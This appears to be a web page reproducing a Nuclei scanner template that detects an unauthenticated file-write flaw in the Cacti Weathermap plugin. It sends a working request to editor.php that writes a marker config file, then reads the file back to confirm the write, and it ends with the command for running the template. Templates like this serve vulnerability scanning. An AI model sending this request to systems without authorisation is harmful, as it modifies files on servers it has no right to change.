Cacti Weathermap File Write

ID: cacti-weathermap-file-write

Severity: medium

Author: pikpikcu

Tags: injection,cacti

Description

Cacti Weathermap (a plugin for Cacti, an open-source network monitoring and graphing tool) is vulnerable to file write.

YAML Source

id: cacti-weathermap-file-write

info:
  name: Cacti Weathermap File Write
  author: pikpikcu
  severity: medium
  description: Cacti Weathermap (a plugin for Cacti, an open-source network monitoring and graphing tool) is vulnerable to file write.
  metadata:
    max-request: 2
  tags: injection,cacti

http:
  - method: GET
    path:
      - "{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=poc.conf&action=set_map_properties&param=&param2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7"

  - method: GET
    path:
      - "{{BaseURL}}/plugins/weathermap/configs/poc.conf"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "TITLE 46ea1712d4b13b55b3f680cc5b8b54e8"
        part: body

      - type: status
        status:
          - 200
# digest: 4a0a00473045022031e84e58740b1caeb267e3344e7d02a69bcc5a792e45d13f1c6a9d8ee214bd02022100a8f5f9bdf0713ed2ff97d57518b324a5167deb7008e172ea70ef2cd9d039b0bf:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/vulnerabilities/other/cacti-weathermap-file-write.yaml"

View on Github